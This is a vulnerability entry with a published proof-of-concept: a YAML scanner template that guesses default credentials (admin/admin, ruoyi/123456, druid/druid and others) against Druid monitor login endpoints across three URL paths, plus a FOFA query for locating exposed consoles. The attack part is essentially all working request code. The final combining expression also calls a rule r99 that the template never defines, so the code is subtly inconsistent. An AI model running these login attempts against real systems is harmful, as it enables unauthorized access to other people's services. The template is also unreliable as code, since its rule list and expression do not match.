漏洞描述
Apache Druid default login information (admin/admin) was discovered.
FOFA: title="druid monitor"
druid-default-login: Apache Druid Default Login
PoC代码[已公开]
id: druid-default-login
info:
name: Apache Druid Default Login
author: pikpikcu
severity: high
verified: false
description: |
Apache Druid default login information (admin/admin) was discovered.
FOFA: title="druid monitor"
tags: druid,default-login
created: 2023/06/23
set:
username: "admin"
password: "admin"
username-1: "ruoyi"
password-1: "123456"
username-2: "druid"
password-2: "druid"
password-3: "admin123"
password-4: "admin888"
rules:
r0:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r1:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r2:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r3:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r4:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r5:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r6:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r7:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r8:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r9:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r10:
request:
method: POST
path: /druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r00:
request:
method: POST
path: /submitLogin
body: loginUsername={{username}}&loginPassword={{password}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r11:
request:
method: POST
path: /submitLogin
body: loginUsername={{username}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r22:
request:
method: POST
path: /submitLogin
body: loginUsername={{username}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r33:
request:
method: POST
path: /submitLogin
body: loginUsername={{username}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r44:
request:
method: POST
path: /submitLogin
body: loginUsername={{username}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r55:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r66:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r77:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r88:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r90:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r100:
request:
method: POST
path: /submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r000:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r111:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r222:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r333:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r444:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r555:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-1}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r666:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r777:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-1}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r888:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-2}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r999:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-3}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
r1000:
request:
method: POST
path: /prod-api/druid/submitLogin
body: loginUsername={{username-2}}&loginPassword={{password-4}}
expression: 'response.status == 200 && "^success$".bmatches(response.body)'
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() || r10() || r00() || r11() || r22() || r33() || r44() || r55() || r66() || r77() || r88() || r99() || r100() || r000() || r111() || r222() || r333() || r444() || r555() || r666() || r777() || r888() || r999() || r1000()